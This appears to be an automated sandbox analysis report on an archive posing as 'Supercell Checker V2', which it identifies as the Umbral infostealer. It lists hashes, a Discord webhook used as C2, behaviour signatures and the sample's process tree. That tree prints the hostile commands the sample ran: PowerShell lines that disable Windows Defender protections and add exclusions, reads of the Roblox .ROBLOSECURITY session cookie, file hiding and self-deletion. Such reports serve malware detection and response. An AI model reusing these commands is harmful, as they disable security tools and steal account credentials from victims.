Analysis

  • max time kernel
    93s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-06-2024 16:33

General

  • Target

    Supercell Checker V2.rar

  • Size

    2.5MB

  • MD5

    6a85c4174345ae7048e0e23cfd9312fe

  • SHA1

    18d1be693c0574700ffdbb320ceea2193eb4ef08

  • SHA256

    f93b6b58f0e4a5e9188342452b12a3d06bcb06afb66330f1612b976590442206

  • SHA512

    842004cd0030099ad69e8ac135be19b5cbda7c78250a5381031322b6e5a943e9f955abbdc78a0b820f25b9962900e0e68daa4c49174b55ed8594f48a6de6f7f7

  • SSDEEP

    49152:CLefTZJlvn+7NQGtVFpBXyEd8BDlXwpDGQcKI652sC3mTX7eOp36A:EefdG7NQGR18xj652sCM1

Malware Config

Extracted

Family

umbral

C2

https://discordapp.com/api/webhooks/1254174290409160735/Qr-uInyE4mruCT3mG0YG1t46p_P8iCEfuzjPnBG_oUejRkL1fbzb_eGU4XrFW4GnRBaA

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Supercell Checker V2.rar"
    1⤵
    • Modifies registry class
    PID:3320
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    PID:3140
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:776
    • C:\Program Files\7-Zip\7zG.exe
      "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Supercell Checker V2\" -spe -an -ai#7zMap10488:102:7zEvent17492
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2968
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Supercell Checker V2\Settings.ini
      1⤵
        PID:4336
      • C:\Users\Admin\Downloads\Supercell Checker V2\SuperCell Checker V3.exe
        "C:\Users\Admin\Downloads\Supercell Checker V2\SuperCell Checker V3.exe"
        1⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3868
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4904
        • C:\Windows\SYSTEM32\attrib.exe
          "attrib.exe" +h +s "C:\Users\Admin\Downloads\Supercell Checker V2\SuperCell Checker V3.exe"
          2⤵
          • Views/modifies file attributes
          PID:4568
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Supercell Checker V2\SuperCell Checker V3.exe'
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4056
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1564
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2156
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3992
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4440
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          2⤵
            PID:1620
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            2⤵
              PID:5056
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4760
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              2⤵
              • Detects videocard installed
              PID:4596
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\Supercell Checker V2\SuperCell Checker V3.exe" && pause
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:972
              • C:\Windows\system32\PING.EXE
                ping localhost
                3⤵
                • Runs ping.exe
                PID:1384

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            45ad40f012b09e141955482368549640

            SHA1

            3f9cd15875c1e397c3b2b5592805577ae88a96cb

            SHA256

            ea3b59172f1a33677f9cb3843fb4d6093b806d3a7cf2f3c6d4692f5421f656ce

            SHA512

            3de08f8affca1c1450088f560776cf3d65146cadac43c06eb922c7b3cea436e519966cf38458303ffeb1a58c53f8952cffda6c34216fda7594e014b516e83b33

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            d28a889fd956d5cb3accfbaf1143eb6f

            SHA1

            157ba54b365341f8ff06707d996b3635da8446f7

            SHA256

            21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

            SHA512

            0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            948B

            MD5

            c9b6705519e1eef08f86c4ba5f4286f3

            SHA1

            6c6b179e452ecee2673a1d4fe128f1c06f70577f

            SHA256

            0f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705

            SHA512

            6d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            276798eeb29a49dc6e199768bc9c2e71

            SHA1

            5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

            SHA256

            cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

            SHA512

            0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4yfvq3zg.jxe.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\Downloads\Supercell Checker V2\Settings.ini

            Filesize

            3KB

            MD5

            c750b399d58cdf3e8fdc067863a6b1fe

            SHA1

            2dbb4d87da15c47237fbf01984519297690c47ed

            SHA256

            908d5e63158075de57c41bf072a0e14ba1e835fdd8635c110677357bd687d283

            SHA512

            42f98c3214ce53acf5d6462ff136c0764d5e252eceba3430c82dd2ccb21dd3bfeeb2cab2c828ccf6a434e780ffec16400d7fdd506b0c3706ec1aa73caa0d8178

          • C:\Users\Admin\Downloads\Supercell Checker V2\SuperCell Checker V3.exe

            Filesize

            296KB

            MD5

            30b9127fcf57f7e6711aaaef0001ab01

            SHA1

            45189ab7a7289e2b900f2a44546f548434c10b87

            SHA256

            fb72df13da897d186d9ee31f807d31077490cda21ffefee79e4afbd3a4c496cf

            SHA512

            0b6b1957f600c23a15cce94cab808eb4fe1231e8813a71133a9af57b176962202e14149f7acad79dda0ece78007f78695f0e5242e2fd86fbcca638412076bb43

          • memory/3868-54-0x00000222F3CE0000-0x00000222F3CFE000-memory.dmp

            Filesize

            120KB

          • memory/3868-53-0x00000222F5F50000-0x00000222F5FA0000-memory.dmp

            Filesize

            320KB

          • memory/3868-52-0x00000222F5FD0000-0x00000222F6046000-memory.dmp

            Filesize

            472KB

          • memory/3868-91-0x00000222F3D30000-0x00000222F3D3A000-memory.dmp

            Filesize

            40KB

          • memory/3868-92-0x00000222F5FA0000-0x00000222F5FB2000-memory.dmp

            Filesize

            72KB

          • memory/3868-25-0x00000222F3800000-0x00000222F3850000-memory.dmp

            Filesize

            320KB

          • memory/4056-31-0x0000020F22A60000-0x0000020F22A82000-memory.dmp

            Filesize

            136KB